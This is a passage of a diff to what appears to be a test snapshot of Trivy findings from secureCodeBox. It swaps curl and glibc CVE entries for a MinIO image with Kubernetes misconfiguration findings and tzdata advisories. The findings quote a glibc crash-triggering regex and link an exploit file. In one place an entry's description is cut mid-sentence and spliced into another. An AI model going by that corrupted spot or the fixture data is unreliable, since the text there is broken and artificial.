"https://bugzilla.redhat.com/2107390", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", - "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - "https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", - ], - }, - "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "POST following PUT confusion", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://bugzilla.redhat.com/2107392", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", }, { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", - ], - }, - "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl = 9", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2020-8565", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/security/cve/CVE-2020-8565", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://github.com/kubernetes/kubernetes/issues/95623", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://github.com/kubernetes/kubernetes/pull/95316", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://pkg.go.dev/vuln/GO-2021-0064", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'coredns' of Deployment 'coredns' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", ], }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", - }, - { - "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -57227,62 +56951,154 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", ], }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", - }, - { - "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3134-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3161-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3366-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u11", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3412-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0001", + ], + }, + "category": "Misconfiguration", + "description": "Disable anonymous requests to the API server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set '--anonymous-auth' to 'false'.", + "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://avd.aquasec.com/misconfig/kcv0001", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0006", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0006", + ], + }, + "category": "Misconfiguration", + "description": "Verify kubelet's certificate before establishing connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", + "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/kcv0006", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "LOW", @@ -57290,57 +57106,115 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0010", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0010", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "category": "Misconfiguration", + "description": "Limit the rate at which the API server accepts requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", + "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/kcv0010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV0012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/ksv0012", + ], + }, + "category": "Misconfiguration", + "description": "Always pull images.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", + "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv0012", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0013", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0013", + ], + }, + "category": "Misconfiguration", + "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", + "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://avd.aquasec.com/misconfig/kcv0013", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0018", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/kcv0018", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "LOW", @@ -57348,62 +57222,115 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / 